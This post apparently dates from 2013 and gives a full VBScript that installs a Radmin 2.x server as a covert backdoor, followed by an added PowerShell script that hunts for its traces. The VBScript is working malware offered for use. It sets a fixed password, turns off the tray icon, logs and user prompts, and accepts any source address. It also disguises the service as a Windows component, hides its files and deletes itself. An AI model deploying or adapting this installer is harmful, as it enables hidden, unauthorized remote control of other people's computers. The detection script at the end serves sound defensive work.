VBS script implementing an "ultimate" Radmin backdoor (self-deleting)
Author: Anonymous
Source: ASP Programming
Published: 2013-07-09
The script turns a Radmin 2.x server into a hidden, password-protected remote-control backdoor without touching the Radmin installer: it writes the server's settings straight into HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters (tray icon off, logging off, fixed password, port 1029), registers the renamed server binary as an auto-start service with a Windows-sounding name, hides the dropped files and finally deletes itself. It assumes the Radmin 2.x server executable (renamed to Exporer.exe) together with AdmDll.dll and raddrv.dll have already been copied into %systemroot%\system32, and that it runs with administrative rights. The service metadata is written to ControlSet001 directly, which is only the active control set when HKLM\SYSTEM\Select\Current is 1. The code is as follows:

On Error Resume Next
Const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut   ' unused, kept from the original
Set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & _
    strComputer & "\root\default:StdRegProv")

' Create the Radmin 2.x server key tree under HKLM\SYSTEM.
strKeyPath = "SYSTEM\RAdmin"
oReg.CreateKey HKEY_LOCAL_MACHINE, strKeyPath
strKeyPath = "SYSTEM\RAdmin\v2.0"
oReg.CreateKey HKEY_LOCAL_MACHINE, strKeyPath
strKeyPath = "SYSTEM\RAdmin\v2.0\Server"
oReg.CreateKey HKEY_LOCAL_MACHINE, strKeyPath
strKeyPath = "SYSTEM\RAdmin\v2.0\Server\iplist"
oReg.CreateKey HKEY_LOCAL_MACHINE, strKeyPath
strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters"
oReg.CreateKey HKEY_LOCAL_MACHINE, strKeyPath

' Server parameters are REG_BINARY little-endian DWORDs, written byte by byte.
Set objRegistry = GetObject("Winmgmts:root\default:StdRegProv")
strPath = "SYSTEM\RAdmin\v2.0\Server\Parameters"
uBinary = Array(0, 0, 0, 0)   ' AskUser = 0: do not prompt the logged-on user
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE, strPath, "AskUser", uBinary)
uBinary = Array(0, 0, 0, 0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE, strPath, "AutoAllow", uBinary)
uBinary = Array(1, 0, 0, 0)   ' DisableTrayIcon = 1: no tray icon for the user to notice
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE, strPath, "DisableTrayIcon", uBinary)
uBinary = Array(0, 0, 0, 0)   ' EnableEventLog = 0: no event log entries
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE, strPath, "EnableEventLog", uBinary)
uBinary = Array(0, 0, 0, 0)   ' EnableLogFile = 0: no log file
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE, strPath, "EnableLogFile", uBinary)
uBinary = Array(0, 0, 0, 0)   ' FilterIp = 0: accept connections from any address
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE, strPath, "FilterIp", uBinary)
uBinary = Array(0, 0, 0, 0)   ' NTAuthEnabled = 0: use Radmin's own password, not Windows accounts
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE, strPath, "NTAuthEnabled", uBinary)
' Password value as exported from the registry, hex converted to decimal; password: 241241241
uBinary = Array(198, 195, 162, 215, 37, 223, 10, 224, 99, 83, 126, 32, 212, 173, 208, 119)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE, strPath, "Parameter", uBinary)   ' Radmin password
uBinary = Array(5, 4, 0, 0)   ' Port: 05 04 00 00 = 0x0405 = 1029
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE, strPath, "Port", uBinary)
uBinary = Array(10, 0, 0, 0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE, strPath, "Timeout", uBinary)

Set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters"
strValueName = "LogFilePath"
strValue = "c:\logfile.txt"
Set wshshell = CreateObject("wscript.shell")
' Register the renamed Radmin server (Exporer.exe) as an auto-start service; window hidden (0).
a = wshshell.run("sc.exe create WinManageHelp binpath= %systemroot%\system32\Exporer.exe start= auto", 0)
oReg.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, strValue

' Dress the service up as a Windows component. This writes to ControlSet001 directly,
' which is only the live control set when HKLM\SYSTEM\Select\Current = 1.
Set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\ControlSet001\Services\WinManageHelp"
strValueName = "Description"
strValue = "Windows Media Player Windows Management Instrumentation Player Drivers."
oReg.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, strValue
strValueName = "DisplayName"
strValue = "Windows Management Instrumentation Player Drivers"
oReg.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, strValue
strValueName = "ImagePath"
strValue = "c:\windows\system32\Exporer.exe /service"
oReg.SetExpandedStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, strValue

Set wshshell = CreateObject("wscript.shell")
a = wshshell.run("net start WinManageHelp", 0)
' Mark the dropped Radmin files read-only, hidden and system so Explorer does not show them.
b = wshshell.run("attrib +r +h +s %systemroot%\system32\exporer.exe", 0)
c = wshshell.run("attrib +r +h +s %systemroot%\system32\AdmDll.dll", 0)
d = wshshell.run("attrib +r +h +s %systemroot%\system32\raddrv.dll", 0)
' Self-delete. The original used WScript.ScriptName, which is only the file name and
' therefore fails unless the current directory is the script's own; ScriptFullName is reliable.
CreateObject("Scripting.FileSystemObject").DeleteFile WScript.ScriptFullName
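The defensive counterpart, added here as an example and not part of the original page: a PowerShell hunting script that checks a host for the artifacts the installer above leaves behind. The indicator names (the WinManageHelp service, Exporer.exe, AdmDll.dll, raddrv.dll, the HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters key and port 1029) are taken from the script; the function name Find-RadminBackdoor, the output format and the stealth-profile heuristic are assumptions made for this example. It assumes Windows PowerShell 5.1 or later on Windows 8/Server 2012 or newer (for Get-NetTCPConnection) and an elevated prompt, since HKLM\SYSTEM and hidden files under System32 need it.

```powershell
# Added hunting example (not from the original page). Assumes an elevated
# Windows PowerShell 5.1+ session; indicator names come from the VBScript above,
# everything else (function names, heuristics, output) is assumed here.

function Get-RegDword {
    # The script writes REG_BINARY values that are really little-endian DWORDs,
    # e.g. Array(5,4,0,0) -> 05 04 00 00 -> 0x0405 = 1029. Returns $null if absent.
    param($Props, [string]$Name)
    $raw = $Props.$Name
    if ($raw -is [byte[]] -and $raw.Length -ge 4) { return [BitConverter]::ToUInt32($raw, 0) }
    return $null
}

function Find-RadminBackdoor {
    [CmdletBinding()]
    param(
        [string]$ServiceName  = 'WinManageHelp',
        [int]   $ExpectedPort = 1029
    )
    $findings = New-Object 'System.Collections.Generic.List[string]'
    $vals = @{}

    # 1. Radmin 2.x server configuration written by the script.
    $paramKey = 'HKLM:\SYSTEM\RAdmin\v2.0\Server\Parameters'
    if (Test-Path -LiteralPath $paramKey) {
        $findings.Add("Radmin 2.x parameters exist: $paramKey")
        $p = Get-ItemProperty -LiteralPath $paramKey
        $names = @('AskUser', 'AutoAllow', 'DisableTrayIcon', 'EnableEventLog',
                   'EnableLogFile', 'FilterIp', 'NTAuthEnabled', 'Port', 'Timeout')
        foreach ($n in $names) {
            $vals[$n] = Get-RegDword $p $n
            if ($null -ne $vals[$n]) { $findings.Add(('  {0,-16} = {1}' -f $n, $vals[$n])) }
        }
        # Tray icon hidden plus both logs disabled is the stealth profile the script sets.
        if ($vals.DisableTrayIcon -eq 1 -and $vals.EnableEventLog -eq 0 -and $vals.EnableLogFile -eq 0) {
            $findings.Add('  Stealth profile: tray icon hidden, event log and log file disabled')
        }
    }

    # 2. Service masquerading as a WMI component, by name or by the renamed binary.
    $services = Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.Name -eq $ServiceName -or $_.PathName -match 'Exporer\.exe' }
    foreach ($s in $services) {
        $findings.Add("Service $($s.Name) '$($s.DisplayName)' State=$($s.State) Start=$($s.StartMode) Path=$($s.PathName)")
    }
    # The script edits ControlSet001 directly; flag the case where that is not the live set.
    $current   = (Get-ItemProperty -LiteralPath 'HKLM:\SYSTEM\Select').Current
    $activeSet = 'ControlSet{0:D3}' -f $current
    if ((Test-Path -LiteralPath "HKLM:\SYSTEM\ControlSet001\Services\$ServiceName") -and $current -ne 1) {
        $findings.Add("Service key present in ControlSet001 but active control set is $activeSet")
    }

    # 3. Hidden copies of the Radmin server and its DLLs in System32.
    foreach ($f in 'Exporer.exe', 'AdmDll.dll', 'raddrv.dll') {
        $path = Join-Path $env:SystemRoot "System32\$f"
        $item = Get-Item -LiteralPath $path -Force -ErrorAction SilentlyContinue
        if ($item) {
            $findings.Add("File $path Attributes=$($item.Attributes) Size=$($item.Length) LastWrite=$($item.LastWriteTime)")
        }
    }

    # 4. Listener on the configured port (from the registry if present) and its owner.
    $port = if ($vals.Port) { [int]$vals.Port } else { $ExpectedPort }
    Get-NetTCPConnection -State Listen -LocalPort $port -ErrorAction SilentlyContinue | ForEach-Object {
        $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
        $findings.Add("Listener $($_.LocalAddress):$($_.LocalPort) PID=$($_.OwningProcess) ($($proc.ProcessName)) $($proc.Path)")
    }

    return $findings
}

$results = Find-RadminBackdoor
if ($results) { $results } else { 'No Radmin/WinManageHelp artifacts found.' }
```

Run it from an elevated prompt; without elevation the file checks silently miss the hidden system files and the process path of the listener is unavailable. On hosts older than Windows 8/Server 2012 replace the Get-NetTCPConnection step with `netstat -ano | findstr :1029`. Each finding is a string, so the function can be run through PowerShell Remoting across a fleet and the output collected centrally.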